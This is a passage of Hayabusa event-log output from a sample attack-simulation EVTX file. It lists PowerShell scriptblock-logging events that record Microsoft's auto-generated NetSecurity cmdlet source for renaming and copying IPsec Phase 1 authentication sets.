${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 